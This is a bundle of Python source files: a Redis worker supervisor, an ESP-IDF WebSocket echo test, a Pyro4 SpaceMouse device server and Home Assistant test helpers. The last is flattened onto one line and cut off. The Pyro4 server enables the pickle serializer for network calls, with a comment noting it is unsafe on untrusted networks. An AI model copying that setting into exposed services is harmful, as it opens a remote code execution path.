                task.work_queue(redis_db, task_id, service)
            # check integrity of tasks
            if redis_db.hget(task_key, 'priority') is None:
                redis_db.hset(task_key, 'priority', 0)
            if redis_db.hget(task_key, 'queued_time') is None:
                redis_db.hset(task_key, 'queued_time', time.time())


def reorganize_resources():
    """Re-declare the service's resources and release stale reservations."""
    logger.debug(f"[{service}-{pid}]: Reorganizing resources")
    if services[service].valid:
        # Deallocate all resources that are not anymore associated to a running task
        resources = services[service].list_resources()
        # TODO:
        # if multiple workers are for same service with different configurations
        # or storage definition change - restart all workers`
        cleanup_list_resource()
        for resource in resources:
            declare_resource(resource)
            reorganize_reserved_resource(resource)


def cleanup_list_resource():
    logger.debug(f"[{service}-{pid}]: Cleaning up list resource")
    redis_db.delete('admin:resources:' + service)


def declare_resource(resource):
    logger.debug(f"[{service}-{pid}]: Declaring resource {resource}")
    redis_db.lpush('admin:resources:' + service, resource)


def reorganize_reserved_resource(resource):
    logger.debug(f"[{service}-{pid}]: Reorganizing reserved resource {resource}")
    reorganize_reserved_gpu_resource(resource)
    reorganize_reserved_cpu_resource(resource)


def reorganize_reserved_gpu_resource(resource):
    key = 'gpu_resource:%s:%s' % (service, resource)
    reorganize_reserved_resource_by_key(key)


def reorganize_reserved_cpu_resource(resource):
    key = 'cpu_resource:%s:%s' % (service, resource)
    reorganize_reserved_resource_by_key(key)


def reorganize_reserved_resource_by_key(key):
    """Release reservations whose task is no longer running/terminating."""
    running_tasks = redis_db.hgetall(key)
    for reserved_resource, task_id in six.iteritems(running_tasks):
        with redis_db.acquire_lock(task_id):
            status = redis_db.hget('task:' + task_id, 'status')
            if status not in ['running', 'terminating']:
                redis_db.hdel(key, reserved_resource)


reorganize_data()

worker_processes = []
# Placeholder so is_alive() can be called before start_all() replaces it.
# NOTE(review): an unstarted Process reports is_alive() == False, so the
# supervision loop relies on start_all() running before the first check.
worker_butler_process = Process()
PROCESS_CHECK_INTERVAL = 3
WORKER_ADMIN_CHECK_INTERVAL = 1
HEART_BEAT_CHECK_INTERVAL = 10


def start():
    """Main supervision loop: restart children, process admin commands,
    and refresh the Redis heart-beat on fixed intervals."""
    start_all()
    count = 0
    while True:
        count += 1
        if count % PROCESS_CHECK_INTERVAL == 0 and is_any_process_stopped():
            logger.debug(f"[{service}-{pid}]: Any process has stopped")
            restart_all()
            continue
        # Currently, WORKER_ADMIN_CHECK_INTERVAL = 1, can ignore this condition
        if count % WORKER_ADMIN_CHECK_INTERVAL == 0:
            process_worker_admin_command()
        if count % HEART_BEAT_CHECK_INTERVAL == 0:
            process_heart_beat()
        if count % (PROCESS_CHECK_INTERVAL * WORKER_ADMIN_CHECK_INTERVAL * HEART_BEAT_CHECK_INTERVAL) == 0:
            count = 0
        time.sleep(1)


def is_any_process_stopped():
    # Returns True when any child died; falls through to None (falsy) otherwise.
    for worker_process in worker_processes:
        if not worker_process.is_alive():
            logger.debug(f"Worker {worker_process.pid} has stopped")
            return True
    if not worker_butler_process.is_alive():
        logger.debug("Worker butler has stopped")
        return True


def restart_all():
    kill_all()
    worker_processes.clear()
    reorganize_data()
    start_all()


def kill_all():
    for worker_process in worker_processes:
        if worker_process.is_alive():
            logger.debug(f"[{service}-{pid}]: Killing worker {worker_process.pid}")
            worker_process.terminate()
    if worker_butler_process.is_alive():
        logger.debug(f"[{service}-{pid}]: Killing worker butler")
        worker_butler_process.terminate()


def start_all():
    """Spawn the butler plus `process_count` worker processes (all daemonic)."""
    logger.debug(f"[{service}-{pid}]: Starting worker butler")
    global worker_butler_process
    worker_butler_process = Process(target=start_worker_butler, args=(redis_db, services, pid, worker_butler_cycle))
    worker_butler_process.daemon = True
    worker_butler_process.start()

    logger.debug(f"[{service}-{pid}]: Starting {process_count} workers")
    for i in range(0, process_count):
        # Each worker gets its own Mongo client (clients are not fork-safe).
        mongodb_client = DatabaseUtils.get_mongo_client(system_config)
        worker_process = Process(target=start_worker,
                                 args=(redis_db, mongodb_client, services, ttl_policy,
                                       system_config_default["refresh_counter"],
                                       system_config_default["quarantine_time"],
                                       instance_id,
                                       system_config_default["taskfile_dir"],
                                       worker_cycle))
        worker_process.daemon = True
        worker_process.start()
        worker_processes.append(worker_process)


def start_worker(redis_db, mongodb_client, services, ttl_policy, refresh_counter,
                 quarantine_time, instance_id, taskfile_dir, worker_cycle):
    """Child-process entry point: run one Worker loop."""
    worker = Worker(redis_db, mongodb_client, services, ttl_policy, refresh_counter,
                    quarantine_time, instance_id, taskfile_dir, worker_cycle)
    worker.run()


def start_worker_butler(redis_db, services, instance_id, worker_butler_cycle):
    """Child-process entry point: run one WorkerButler loop."""
    worker_butler = WorkerButler(redis_db, services, instance_id, worker_butler_cycle)
    worker_butler.run()


def process_worker_admin_command():
    workeradmin.process(logger, redis_db, service, instance_id)


def process_heart_beat():
    """Exit if our instance key was removed externally; otherwise refresh it."""
    if not is_exists_heart_beat():
        logger.info('stopped by key expiration/removal')
        sys.exit(0)
    set_heart_beat_is_current_time()
    set_expire_time_of_instance(1200)


def is_exists_heart_beat():
    return redis_db.exists(instance_id)


def set_heart_beat_is_current_time():
    redis_db.hset(instance_id, "beat_time", time.time())


def set_expire_time_of_instance(time_in_sec):
    redis_db.expire(instance_id, time_in_sec)


start()
# ===== file: example_test.py =====
"""ESP-IDF example test: run a minimal WebSocket echo server and verify the
DUT (device under test) connects, echoes, and reassembles long messages."""
from __future__ import print_function
from __future__ import unicode_literals
import re
import os
import socket
import select
import hashlib
import base64
import queue
import random
import string
from threading import Thread, Event

import ttfw_idf


def get_my_ip():
    """Return this host's outbound IPv4 address (fallback: 127.0.0.1)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        # doesn't even have to be reachable
        s.connect(('10.255.255.255', 1))
        IP = s.getsockname()[0]
    except Exception:
        IP = '127.0.0.1'
    finally:
        s.close()
    return IP


# Simple Websocket server for testing purposes
class Websocket(object):
    # Bytes of header handled here: 2 framing bytes + 4-byte client mask.
    HEADER_LEN = 6

    def __init__(self, port):
        self.port = port
        self.socket = socket.socket()
        self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.socket.settimeout(10.0)
        self.send_q = queue.Queue()
        self.shutdown = Event()
        self.conn = None

    def __enter__(self):
        # Bind/listen and serve one client on a background thread.
        try:
            self.socket.bind(('', self.port))
        except socket.error as e:
            print("Bind failed:{}".format(e))
            raise
        self.socket.listen(1)
        self.server_thread = Thread(target=self.run_server)
        self.server_thread.start()
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        self.shutdown.set()
        self.server_thread.join()
        self.socket.close()
        if self.conn:
            self.conn.close()

    def run_server(self):
        self.conn, address = self.socket.accept()  # accept new connection
        # NOTE(review): this sets the timeout on the *listening* socket after
        # accept; self.conn keeps the default timeout — confirm intent.
        self.socket.settimeout(10.0)
        print("Connection from: {}".format(address))
        self.establish_connection()
        print("WS established")
        # Handle connection until client closes it, will echo any data received and send data from send_q queue
        self.handle_conn()

    def establish_connection(self):
        """Read from the client until an HTTP Upgrade request arrives, then handshake."""
        while not self.shutdown.is_set():
            try:
                # receive data stream. it won't accept data packet greater than 1024 bytes
                data = self.conn.recv(1024).decode()
                if not data:  # exit if data is not received
                    # NOTE(review): bare `raise` with no active exception
                    # raises RuntimeError, not a socket error — confirm intent.
                    raise
                if "Upgrade: websocket" in data and "Connection: Upgrade" in data:
                    self.handshake(data)
                    return
            except socket.error as err:
                print("Unable to establish a websocket connection: {}".format(err))
                raise

    def handshake(self, data):
        """Answer the client's Upgrade request per RFC 6455 (SHA-1 + base64 accept key)."""
        # Magic string from RFC
        MAGIC_STRING = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"
        headers = data.split("\r\n")
        for header in headers:
            if "Sec-WebSocket-Key" in header:
                client_key = header.split()[1]
        if client_key:
            resp_key = client_key + MAGIC_STRING
            resp_key = base64.standard_b64encode(hashlib.sha1(resp_key.encode()).digest())
            resp = "HTTP/1.1 101 Switching Protocols\r\n" + \
                   "Upgrade: websocket\r\n" + \
                   "Connection: Upgrade\r\n" + \
                   "Sec-WebSocket-Accept: {}\r\n\r\n".format(resp_key.decode())
            self.conn.send(resp.encode())

    def handle_conn(self):
        """Echo incoming frames and drain the outgoing queue until shutdown."""
        while not self.shutdown.is_set():
            r, w, e = select.select([self.conn], [], [], 1)
            try:
                if self.conn in r:
                    self.echo_data()
                if not self.send_q.empty():
                    self._send_data_(self.send_q.get())
            except socket.error as err:
                print("Stopped echoing data: {}".format(err))
                raise

    def echo_data(self):
        """Read one masked frame from the client and echo its payload back."""
        header = bytearray(self.conn.recv(self.HEADER_LEN, socket.MSG_WAITALL))
        if not header:  # exit if socket closed by peer
            return
        # Remove mask bit
        payload_len = ~(1 << 7) & header[1]
        payload = bytearray(self.conn.recv(payload_len, socket.MSG_WAITALL))
        if not payload:  # exit if socket closed by peer
            return
        frame = header + payload
        decoded_payload = self.decode_frame(frame)
        print("Sending echo...")
        self._send_data_(decoded_payload)

    def _send_data_(self, data):
        frame = self.encode_frame(data)
        self.conn.send(frame)

    def send_data(self, data):
        # Thread-safe entry point: queued frames are sent from handle_conn().
        self.send_q.put(data.encode())

    def decode_frame(self, frame):
        """Unmask a client frame's payload (XOR with the 4-byte mask key)."""
        # Mask out MASK bit from payload length, this len is only valid for short messages (<126)
        payload_len = ~(1 << 7) & frame[1]
        mask = frame[2:self.HEADER_LEN]
        encrypted_payload = frame[self.HEADER_LEN:self.HEADER_LEN + payload_len]
        payload = bytearray()
        for i in range(payload_len):
            payload.append(encrypted_payload[i] ^ mask[i % 4])
        return payload

    def encode_frame(self, payload):
        """Build an unmasked server->client text frame for the given payload."""
        # Set FIN = 1 and OP_CODE = 1 (text)
        header = (1 << 7) | (1 << 0)
        frame = bytearray([header])
        payload_len = len(payload)
        # If payload len is longer than 125 then the next 16 bits are used to encode length
        if payload_len > 125:
            frame.append(126)
            frame.append(payload_len >> 8)
            frame.append(0xFF & payload_len)
        else:
            frame.append(payload_len)
        frame += payload
        return frame


def test_echo(dut):
    """Expect ten 'Received=hello N' echo lines from the DUT log."""
    dut.expect("WEBSOCKET_EVENT_CONNECTED")
    for i in range(0, 10):
        dut.expect(re.compile(r"Received=hello (\d)"), timeout=30)
    print("All echos received")


def test_recv_long_msg(dut, websocket, msg_len, repeats):
    """Send a random msg_len-char string `repeats` times and verify the DUT
    reassembles and echoes it back intact (exercises frame fragmentation)."""
    send_msg = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase + string.digits)
                       for _ in range(msg_len))

    for _ in range(repeats):
        websocket.send_data(send_msg)

        recv_msg = ''
        while len(recv_msg) < msg_len:
            # Filter out color encoding
            match = dut.expect(re.compile(r"Received=([a-zA-Z0-9]*).*\n"), timeout=30)[0]
            recv_msg += match

        if recv_msg == send_msg:
            print("Sent message and received message are equal")
        else:
            raise ValueError("DUT received string do not match sent string, \nexpected: {}\nwith length {}\
                             \nreceived: {}\nwith length {}".format(send_msg, len(send_msg), recv_msg, len(recv_msg)))


@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_websocket(env, extra_data):
    """
    steps:
      1. join AP
      2. connect to uri specified in the config
      3. send and receive data
    """
    dut1 = env.get_dut("websocket", "examples/protocols/websocket", dut_class=ttfw_idf.ESP32DUT)
    # check and log bin size
    binary_file = os.path.join(dut1.app.binary_path, "websocket-example.bin")
    bin_size = os.path.getsize(binary_file)
    ttfw_idf.log_performance("websocket_bin_size", "{}KB".format(bin_size // 1024))
    ttfw_idf.check_performance("websocket_bin_size", bin_size // 1024, dut1.TARGET)

    try:
        if "CONFIG_WEBSOCKET_URI_FROM_STDIN" in dut1.app.get_sdkconfig():
            uri_from_stdin = True
        else:
            uri = dut1.app.get_sdkconfig()["CONFIG_WEBSOCKET_URI"].strip('"')
            uri_from_stdin = False
    except Exception:
        print('ENV_TEST_FAILURE: Cannot find uri settings in sdkconfig')
        raise

    # start test
    dut1.start_app()

    if uri_from_stdin:
        server_port = 4455
        with Websocket(server_port) as ws:
            uri = "ws://{}:{}".format(get_my_ip(), server_port)
            print("DUT connecting to {}".format(uri))
            dut1.expect("Please enter uri of websocket endpoint", timeout=30)
            dut1.write(uri)
            test_echo(dut1)
            # Message length should exceed DUT's buffer size to test fragmentation, default is 1024 byte
            test_recv_long_msg(dut1, ws, 2000, 3)
    else:
        print("DUT connecting to {}".format(uri))
        test_echo(dut1)


if __name__ == '__main__':
    test_examples_protocol_websocket()
# ===== file: input_server.py =====
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

# first to start the nameserver start: python -m Pyro4.naming
"""Pyro4 server that publishes SpaceMouse device state, plus an expert policy
that turns that state into robot actions."""
import Pyro4
from threading import Thread
import time
import numpy as np
from rlkit.launchers import conf as config

# pickle is required for numpy payloads; it is unsafe on untrusted networks —
# only expose this daemon on a trusted host/interface.
Pyro4.config.SERIALIZERS_ACCEPTED = set(['pickle', 'json', 'marshal', 'serpent'])
Pyro4.config.SERIALIZER = 'pickle'

# Shared state: written by the remote device client, read by SpaceMouseExpert.
device_state = None


@Pyro4.expose
class DeviceState(object):
    # NOTE(review): this class attribute is never used — get/set go through
    # the module-level `device_state` global so all instances share one state.
    state = None

    def get_state(self):
        return device_state

    def set_state(self, state):
        global device_state
        device_state = state


class SpaceMouseExpert:
    """Expert policy driven by a SpaceMouse: maps device state to a
    (xyz, rot) action vector with remapping, thresholding, scaling, clipping."""
    def __init__(
            self,
            xyz_dims=3,
            xyz_remap=[0, 1, 2],
            xyz_scale=[1, 1, 1],
            xyz_abs_threshold=0.0,
            rot_dims=3,
            rot_remap=[0, 1, 2],
            rot_scale=[1, 1, 1],
            rot_abs_threshold=0.0,
            rot_discrete=False,
            min_clip=-np.inf,
            max_clip=np.inf
    ):
        """TODO: fill in other params"""
        self.xyz_dims = xyz_dims
        self.xyz_remap = np.array(xyz_remap)
        self.xyz_scale = np.array(xyz_scale)
        self.xyz_abs_threshold = xyz_abs_threshold
        self.rot_dims = rot_dims
        self.rot_remap = rot_remap
        self.rot_scale = rot_scale
        self.rot_abs_threshold = rot_abs_threshold
        self.rot_discrete = rot_discrete
        self.min_clip = min_clip
        self.max_clip = max_clip

        # Run the Pyro daemon in the background for the process lifetime.
        self.thread = Thread(target=start_server)
        self.thread.daemon = True
        self.thread.start()

        self.device_state = DeviceState()

    def get_action(self, obs):
        """Must return (action, valid, reset, accept)"""
        state = self.device_state.get_state()
        # time.sleep(0.1)
        if state is None:
            return None, False, False, False
        dpos, rotation, roll, pitch, yaw, accept, reset = (
            state["dpos"],
            state["rotation"],
            state["roll"],
            state["pitch"],
            state["yaw"],
            state["grasp"],  # ["left_click"],
            state["reset"],  # ["right_click"],
        )
        # Translation: remap axes, zero sub-threshold noise, scale, clip.
        xyz = dpos[self.xyz_remap]
        xyz[np.abs(xyz) < self.xyz_abs_threshold] = 0.0
        xyz = xyz * self.xyz_scale
        xyz = np.clip(xyz, self.min_clip, self.max_clip)
        # Rotation: same pipeline; optionally keep only the dominant axis.
        rot = np.array([roll, pitch, yaw])
        rot[np.abs(rot) < self.rot_abs_threshold] = 0.0
        if self.rot_discrete:
            max_i = np.argmax(np.abs(rot))
            for i in range(len(rot)):
                if i != max_i:
                    rot[i] = 0.0
        rot = rot * self.rot_scale
        rot = np.clip(rot, self.min_clip, self.max_clip)
        a = np.concatenate([xyz[:self.xyz_dims], rot[:self.rot_dims]])
        # valid is False when every component is (near) zero — no input.
        valid = not np.all(np.isclose(a, 0))
        # print(a, roll, pitch, yaw, valid)
        return (a, valid, reset, accept)


def start_server():
    """Register DeviceState with the Pyro name server and serve forever."""
    daemon = Pyro4.Daemon(config.SPACEMOUSE_HOSTNAME)
    ns = Pyro4.locateNS()                      # find the name server
    uri = daemon.register(DeviceState)         # register the class as a Pyro object
    # NOTE(review): registered under the tutorial name "example.greeting" —
    # clients must look up this exact name; consider a descriptive one.
    ns.register("example.greeting", uri)       # register the object with a name in the name server
    print("uri:", uri)
    print("Server ready.")
    daemon.requestLoop()                       # start the event loop of the server to wait for calls


if __name__ == "__main__":
    expert = SpaceMouseExpert()
    for i in range(100):
        time.sleep(1)
        print(expert.get_action(None))
# ===== file: common.py =====
"""Test the helper method for writing tests.""" import asyncio import collections from collections import OrderedDict from contextlib import contextmanager from datetime import timedelta import functools as ft from io import StringIO import json import logging import os import sys import threading import time import uuid from aiohttp.test_utils import unused_port as get_test_instance_port # noqa from homeassistant import auth, config_entries, core as ha, loader from homeassistant.auth import ( auth_store, models as auth_models, permissions as auth_permissions, providers as auth_providers, ) from homeassistant.auth.permissions import system_policies from homeassistant.components import recorder from homeassistant.components.device_automation import ( # noqa: F401 _async_get_device_automation_capabilities as async_get_device_automation_capabilities, _async_get_device_automations as async_get_device_automations, ) from homeassistant.components.mqtt.models import Message from homeassistant.config import async_process_component_config from homeassistant.const import ( ATTR_DISCOVERED, ATTR_SERVICE, DEVICE_DEFAULT_NAME, EVENT_HOMEASSISTANT_CLOSE, EVENT_PLATFORM_DISCOVERED, EVENT_STATE_CHANGED, EVENT_TIME_CHANGED, STATE_OFF, STATE_ON, ) from homeassistant.core import State from homeassistant.helpers import ( area_registry, device_registry, entity, entity_platform, entity_registry, intent, restore_state, storage, ) from homeassistant.helpers.json import JSONEncoder from homeassistant.setup import setup_component from homeassistant.util.async_ import run_callback_threadsafe import homeassistant.util.dt as date_util from homeassistant.util.unit_system import METRIC_SYSTEM import homeassistant.util.yaml.loader as yaml_loader from tests.async_mock import AsyncMock, Mock, patch _LOGGER = logging.getLogger(__name__) INSTANCES = [] CLIENT_ID = "https://example.com/app" CLIENT_REDIRECT_URI = "https://example.com/app/callback" def threadsafe_callback_factory(func): """Create 
threadsafe functions out of callbacks. Callback needs to have `hass` as first argument. """ @ft.wraps(func) def threadsafe(*args, **kwargs): """Call func threadsafe.""" hass = args[0] return run_callback_threadsafe( hass.loop, ft.partial(func, *args, **kwargs) ).result() return threadsafe def threadsafe_coroutine_factory(func): """Create threadsafe functions out of coroutine. Callback needs to have `hass` as first argument. """ @ft.wraps(func) def threadsafe(*args, **kwargs): """Call func threadsafe.""" hass = args[0] return asyncio.run_coroutine_threadsafe( func(*args, **kwargs), hass.loop ).result() return threadsafe def get_test_config_dir(*add_path): """Return a path to a test config dir.""" return os.path.join(os.path.dirname(__file__), "testing_config", *add_path) def get_test_home_assistant(): """Return a Home Assistant object pointing at test config directory.""" if sys.platform == "win32": loop = asyncio.ProactorEventLoop() else: loop = asyncio.new_event_loop() asyncio.set_event_loop(loop) hass = loop.run_until_complete(async_test_home_assistant(loop)) stop_event = threading.Event() def run_loop(): """Run event loop.""" # pylint: disable=protected-access loop._thread_ident = threading.get_ident() loop.run_forever() stop_event.set() orig_stop = hass.stop def start_hass(*mocks): """Start hass.""" asyncio.run_coroutine_threadsafe(hass.async_start(), loop).result() def stop_hass(): """Stop hass.""" orig_stop() stop_event.wait() loop.close() hass.start = start_hass hass.stop = stop_hass threading.Thread(name="LoopThread", target=run_loop, daemon=False).start() return hass # pylint: disable=protected-access async def async_test_home_assistant(loop): """Return a Home Assistant object pointing at test config dir.""" hass = ha.HomeAssistant() store = auth_store.AuthStore(hass) hass.auth = auth.AuthManager(hass, store, {}, {}) ensure_auth_manager_loaded(hass.auth) INSTANCES.append(hass) orig_async_add_job = hass.async_add_job orig_async_add_executor_job = 
hass.async_add_executor_job orig_async_create_task = hass.async_create_task def async_add_job(target, *args): """Add job.""" check_target = target while isinstance(check_target, ft.partial): check_target = check_target.func if isinstance(check_target, Mock) and not isinstance(target, AsyncMock): fut = asyncio.Future() fut.set_result(target(*args)) return fut return orig_async_add_job(target, *args) def async_add_executor_job(target, *args): """Add executor job.""" check_target = target while isinstance(check_target, ft.partial): check_target = check_target.func if isinstance(check_target, Mock): fut = asyncio.Future() fut.set_result(target(*args)) return fut return orig_async_add_executor_job(target, *args) def async_create_task(coroutine): """Create task.""" if isinstance(coroutine, Mock) and not isinstance(coroutine, AsyncMock): fut = asyncio.Future() fut.set_result(None) return fut return orig_async_create_task(coroutine) hass.async_add_job = async_add_job hass.async_add_executor_job = async_add_executor_job hass.async_create_task = async_create_task hass.config.location_name = "test home" hass.config.config_dir = get_test_config_dir() hass.config.latitude = 32.87336 hass.config.longitude = -117.22743 hass.config.elevation = 0 hass.config.time_zone = date_util.get_time_zone("US/Pacific") hass.config.units = METRIC_SYSTEM hass.config.media_dirs = {"local": get_test_config_dir("media")} hass.config.skip_pip = True hass.config.legacy_templates = False hass.config_entries = config_entries.ConfigEntries(hass, {}) hass.config_entries._entries = [] hass.config_entries._store._async_ensure_stop_listener = lambda: None hass.state = ha.CoreState.running # Mock async_start orig_start = hass.async_start async def mock_async_start(): """Start the mocking.""" # We only mock time during tests and we want to track tasks with patch("homeassistant.core._async_create_timer"), patch.object( hass, "async_stop_track_tasks" ): await orig_start() hass.async_start = mock_async_start 
@ha.callback def clear_instance(event): """Clear global instance.""" INSTANCES.remove(hass) hass.bus.async_listen_once(EVENT_HOMEASSISTANT_CLOSE, clear_instance) return hass def async_mock_service(hass, domain, service, schema=None): """Set up a fake service & return a calls log list to this service.""" calls = [] @ha.callback def mock_service_log(call): # pylint: disable=unnecessary-lambda """Mock service call.""" calls.append(call) hass.services.async_register(domain, service, mock_service_log, schema=schema) return calls mock_service = threadsafe_callback_factory(async_mock_service) @ha.callback def async_mock_intent(hass, intent_typ): """Set up a fake intent handler.""" intents = [] class MockIntentHandler(intent.IntentHandler): intent_type = intent_typ async def async_handle(self, intent): """Handle the intent.""" intents.append(intent) return intent.create_response() intent.async_register(hass, MockIntentHandler()) return intents @ha.callback def async_fire_mqtt_message(hass, topic, payload, qos=0, retain=False): """Fire the MQTT message.""" if isinstance(payload, str): payload = payload.encode("utf-8") msg = Message(topic, payload, qos, retain) hass.data["mqtt"]._mqtt_handle_message(msg) fire_mqtt_message = threadsafe_callback_factory(async_fire_mqtt_message) @ha.callback def async_fire_time_changed(hass, datetime_, fire_all=False): """Fire a time changes event.""" hass.bus.async_fire(EVENT_TIME_CHANGED, {"now": date_util.as_utc(datetime_)}) for task in list(hass.loop._scheduled): if not isinstance(task, asyncio.TimerHandle): continue if task.cancelled(): continue mock_seconds_into_future = datetime_.timestamp() - time.time() future_seconds = task.when() - hass.loop.time() if fire_all or mock_seconds_into_future >= future_seconds: with patch( "homeassistant.helpers.event.time_tracker_utcnow", return_value=date_util.as_utc(datetime_), ): task._run() task.cancel() fire_time_changed = threadsafe_callback_factory(async_fire_time_changed) def 
fire_service_discovered(hass, service, info): """Fire the MQTT message.""" hass.bus.fire( EVENT_PLATFORM_DISCOVERED, {ATTR_SERVICE: service, ATTR_DISCOVERED: info} ) @ha.callback def async_fire_service_discovered(hass, service, info): """Fire the MQTT message.""" hass.bus.async_fire( EVENT_PLATFORM_DISCOVERED, {ATTR_SERVICE: service, ATTR_DISCOVERED: info} ) def load_fixture(filename): """Load a fixture.""" path = os.path.join(os.path.dirname(__file__), "fixtures", filename) with open(path, encoding="utf-8") as fptr: return fptr.read() def mock_state_change_event(hass, new_state, old_state=None): """Mock state change envent.""" event_data = {"entity_id": new_state.entity_id, "new_state": new_state} if old_state: event_data["old_state"] = old_state hass.bus.fire(EVENT_STATE_CHANGED, event_data, context=new_state.context) @ha.callback def mock_component(hass, component): """Mock a component is setup.""" if component in hass.config.components: AssertionError(f"Integration {component} is already setup") hass.config.components.add(component) def mock_registry(hass, mock_entries=None): """Mock the Entity Registry.""" registry = entity_registry.EntityRegistry(hass) registry.entities = mock_entries or OrderedDict() registry._rebuild_index() hass.data[entity_registry.DATA_REGISTRY] = registry return registry def mock_area_registry(hass, mock_entries=None): """Mock the Area Registry.""" registry = area_registry.AreaRegistry(hass) registry.areas = mock_entries or OrderedDict() hass.data[area_registry.DATA_REGISTRY] = registry return registry def mock_device_registry(hass, mock_entries=None, mock_deleted_entries=None): """Mock the Device Registry.""" registry = device_registry.DeviceRegistry(hass) registry.devices = mock_entries or OrderedDict() registry.deleted_devices = mock_deleted_entries or OrderedDict() registry._rebuild_index() hass.data[device_registry.DATA_REGISTRY] = registry return registry class MockGroup(auth_models.Group): """Mock a group in Home Assistant.""" 
def __init__(self, id=None, name="Mock Group", policy=system_policies.ADMIN_POLICY): """Mock a group.""" kwargs = {"name": name, "policy": policy} if id is not None: kwargs["id"] = id super().__init__(**kwargs) def add_to_hass(self, hass): """Test helper to add entry to hass.""" return self.add_to_auth_manager(hass.auth) def add_to_auth_manager(self, auth_mgr): """Test helper to add entry to hass.""" ensure_auth_manager_loaded(auth_mgr) auth_mgr._store._groups[self.id] = self return self class MockUser(auth_models.User): """Mock a user in Home Assistant.""" def __init__( self, id=None, is_owner=False, is_active=True, name="Mock User", system_generated=False, groups=None, ): """Initialize mock user.""" kwargs = { "is_owner": is_owner, "is_active": is_active, "name": name, "system_generated": system_generated, "groups": groups or [], "perm_lookup": None, } if id is not None: kwargs["id"] = id super().__init__(**kwargs) def add_to_hass(self, hass): """Test helper to add entry to hass.""" return self.add_to_auth_manager(hass.auth) def add_to_auth_manager(self, auth_mgr): """Test helper to add entry to hass.""" ensure_auth_manager_loaded(auth_mgr) auth_mgr._store._users[self.id] = self return self def mock_policy(self, policy): """Mock a policy for a user.""" self._permissions = auth_permissions.PolicyPermissions(policy, self.perm_lookup) async def register_auth_provider(hass, config): """Register an auth provider.""" provider = await auth_providers.auth_provider_from_config( hass, hass.auth._store, config ) assert provider is not None, "Invalid config specified" key = (provider.type, provider.id) providers = hass.auth._providers if key in providers: raise ValueError("Provider already registered") providers[key] = provider return provider @ha.callback def ensure_auth_manager_loaded(auth_mgr): """Ensure an auth manager is considered loaded.""" store = auth_mgr._store if store._users is None: store._set_defaults() class MockModule: """Representation of a fake module.""" # 
pylint: disable=invalid-name def __init__( self, domain=None, dependencies=None, setup=None, requirements=None, config_schema=None, platform_schema=None, platform_schema_base=None, async_setup=None, async_setup_entry=None, async_unload_entry=None, async_migrate_entry=None, async_remove_entry=None, partial_manifest=None, ): """Initialize the mock module.""" self.__name__ = f"homeassistant.components.{domain}" self.__file__ = f"homeassistant/components/{domain}" self.DOMAIN = domain self.DEPENDENCIES = dependencies or [] self.REQUIREMENTS = requirements or [] # Overlay to be used when generating manifest from this module self._partial_manifest = partial_manifest if config_schema is not None: self.CONFIG_SCHEMA = config_schema if platform_schema is not None: self.PLATFORM_SCHEMA = platform_schema if platform_schema_base is not None: self.PLATFORM_SCHEMA_BASE = platform_schema_base if setup is not None: # We run this in executor, wrap it in function self.setup = lambda *args: setup(*args) if async_setup is not None: self.async_setup = async_setup if setup is None and async_setup is None: self.async_setup = AsyncMock(return_value=True) if async_setup_entry is not None: self.async_setup_entry = async_setup_entry if async_unload_entry is not None: self.async_unload_entry = async_unload_entry if async_migrate_entry is not None: self.async_migrate_entry = async_migrate_entry if async_remove_entry is not None: self.async_remove_entry = async_remove_entry def mock_manifest(self): """Generate a mock manifest to represent this module.""" return { **loader.manifest_from_legacy_module(self.DOMAIN, self), **(self._partial_manifest or {}), } class MockPlatform: """Provide a fake platform.""" __name__ = "homeassistant.components.light.bla" __file__ = "homeassistant/components/blah/light" # pylint: disable=invalid-name def __init__( self, setup_platform=None, dependencies=None, platform_schema=None, async_setup_platform=None, async_setup_entry=None, scan_interval=None, ): 
"""Initialize the platform.""" self.DEPENDENCIES = dependencies or [] if platform_schema is not None: self.PLATFORM_SCHEMA = platform_schema if scan_interval is not None: self.SCAN_INTERVAL = scan_interval if setup_platform is not None: # We run this in executor, wrap it in function self.setup_platform = lambda *args: setup_platform(*args) if async_setup_platform is not None: self.async_setup_platform = async_setup_platform if async_setup_entry is not None: self.async_setup_entry = async_setup_entry if setup_platform is None and async_setup_platform is None: self.async_setup_platform = AsyncMock(return_value=None) class MockEntityPlatform(entity_platform.EntityPlatform): """Mock class with some mock defaults.""" def __init__( self, hass, logger=None, domain="test_domain", platform_name="test_platform", platform=None, scan_interval=timedelta(seconds=15), entity_namespace=None, ): """Initialize a mock entity platform.""" if logger is None: logger = logging.getLogger("homeassistant.helpers.entity_platform") # Otherwise the constructor will blow up. 
if isinstance(platform, Mock) and isinstance(platform.PARALLEL_UPDATES, Mock): platform.PARALLEL_UPDATES = 0 super().__init__( hass=hass, logger=logger, domain=domain, platform_name=platform_name, platform=platform, scan_interval=scan_interval, entity_namespace=entity_namespace, ) class MockToggleEntity(entity.ToggleEntity): """Provide a mock toggle device.""" def __init__(self, name, state, unique_id=None): """Initialize the mock entity.""" self._name = name or DEVICE_DEFAULT_NAME self._state = state self.calls = [] @property def name(self): """Return the name of the entity if any.""" self.calls.append(("name", {})) return self._name @property def state(self): """Return the state of the entity if any.""" self.calls.append(("state", {})) return self._state @property def is_on(self): """Return true if entity is on.""" self.calls.append(("is_on", {})) return self._state == STATE_ON def turn_on(self, **kwargs): """Turn the entity on.""" self.calls.append(("turn_on", kwargs)) self._state = STATE_ON def turn_off(self, **kwargs): """Turn the entity off.""" self.calls.append(("turn_off", kwargs)) self._state = STATE_OFF def last_call(self, method=None): """Return the last call.""" if not self.calls: return None if method is None: return self.calls[-1] try: return next(call for call in reversed(self.calls) if call[0] == method) except StopIteration: return None class MockConfigEntry(config_entries.ConfigEntry): """Helper for creating config entries that adds some defaults.""" def __init__( self, *, domain="test", data=None, version=1, entry_id=None, source=config_entries.SOURCE_USER, title="Mock Title", state=None, options={}, system_options={}, 